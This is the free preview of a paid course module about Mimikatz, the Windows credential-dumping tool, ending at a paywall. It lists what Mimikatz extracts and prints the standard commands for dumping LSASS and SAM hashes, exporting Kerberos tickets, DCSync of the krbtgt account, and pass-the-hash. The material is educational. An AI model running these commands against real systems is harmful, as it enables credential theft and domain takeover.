Mimikatz is the tool that defined modern Windows credential attacks. Benjamin Delpy’s 2011 research paper accompanying it single-handedly changed how the security community thinks about Windows auth. This module covers what Mimikatz does, how defenders catch it, and why Credential Guard matters.
What it extracts
Mimikatz reads credentials from process memory (primarily LSASS — Local Security Authority Subsystem Service) and from local SAM/SECRETS registry hives. Specifically:
- NTLM hashes of logged-in users (from LSASS)
- Plaintext passwords if WDigest is enabled (legacy — disabled by default in modern Windows)
- Kerberos tickets — TGT and service tickets
- Certificates and their private keys from the cert store
- Local SAM password hashes
- Cached domain credentials (MSCACHE)
Classic commands
# Elevate to debug privileges
privilege::debug
# Dump all logon passwords/hashes from LSASS
sekurlsa::logonpasswords
# Dump local SAM password hashes
lsadump::sam
# Export Kerberos tickets to disk
sekurlsa::tickets /export
# DCSync — replicate all password hashes from a DC (needs DCSync rights)
lsadump::dcsync /domain:corp.example.com /user:krbtgt
# Pass-the-Hash — authenticate using NTLM hash
sekurlsa::pth /user:Administrator /domain:corp /ntlm:HASH /run:cmdGolden Ticket — the doomsday capability
If Mimikatz extracts the krbtgt account hash (via DCSync or from NTDS.dit), it can forge Kerberos TGTs for ANY user in the domain:
🔐 Intermediate Module · Basic Tier
Continue reading with Basic tier (₹499/month)
You've read 33% of this module. Unlock the remaining deep-dive, quiz, and every other Intermediate module.
99+ modulesAll levels up to this tier
20-question quizzesUnlimited retries with explanations
Completion certificatesShareable on LinkedIn
3 more sections locked below